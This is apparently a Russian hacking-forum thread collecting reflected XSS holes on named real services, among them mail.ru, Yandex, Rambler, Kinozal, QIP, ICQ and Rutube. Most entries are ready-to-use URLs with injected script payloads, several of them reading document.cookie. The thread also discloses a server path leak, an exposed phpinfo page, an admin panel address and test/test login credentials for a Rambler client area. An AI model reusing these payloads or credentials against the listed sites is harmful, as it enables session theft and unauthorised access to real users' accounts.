Пассивные xss на почтовых серверах

Мой Круг [Яндекс]

 

[email protected]

 

МИРТЕСЕН

Code:

http://mirtesen.ru/groups/map#search&<script>alert(document.cookie)</script>

Прошу модераторов простить меня за то, что я отхожу от тематики почтовых серверов- но думаю, социальные сети можно приравнять к ним по важности.

 

Снова i.ua - на этот раз пассивка

http://events.i.ua/search/?words=</title>XSS&type=text

 

http://mail.kinozal.tv/

http://kinozal.tv/login.php?returnto={XSS}

 

http://webmail.rin.ru/

http://search.rin.ru/?text={XSS}

 

на сайте http://www.mylivepage.ru в поле для поиска

 

META.UA (Поисковик, почта...)

Ну и так, в придачу rutube.ru + раскрытие путей

http://ru tube.ru/channels.html?dir=asc&order_by=alias%22%3E%3Cimg%20src=javascript:alert(document.cookie)%3E
/var/virtual/rutube.ru/lib/Rutube/Obj/Channel.pm line 658

 

Mail.ru

 

e-mail.ru

Найдена лично мной

 

e-mail.ru

А это лично мной)

 

Работает в IE

Code:

http://sysadmin.mail.ru/pforum/profile.php?mode=viewprofile&u="><script>alert(/xss/)</script> 

 

A.UA - унылый веб2.0 сервис (бета)

и так далее

 

Rambler

тестил в Опере

 

yandex

Code:

http://old-kubok.yandex.ru/cgi/cert.pl?s=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

 

http://gallery.icq.com/browse.php?search=search&term=%3Cscript%3Ealert(document.cookie)%3C/script%3E

 

phpinfo
http://fo2.rambler.ru/info.php phpinfo

хсс
http://help.rambler.ru/feedback.html?s=7715&fio=%22%3E%3Cscript%3Ealert(/2fed/)%3C/script%3E

админка
http://in.fo2.rambler.ru/administrator/index.php?

и ещё
http://ad.rambler.ru/
CLIENTS LOGIN

логин=test
пасс=test

 

Пассивка на mail.ru, работает онли в хроме:

Code:

http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,501,20,9&element=1&code="><script>alert(document.cookie)</script>

 

Пассивка на qip.ru
http://video.qip.ru/broadcast/view/?id=2172438&from="><script>alert('XSS by FatalLerr0r')</script>

 

Mail.ru
Работает через пост запрос в поле E-Mail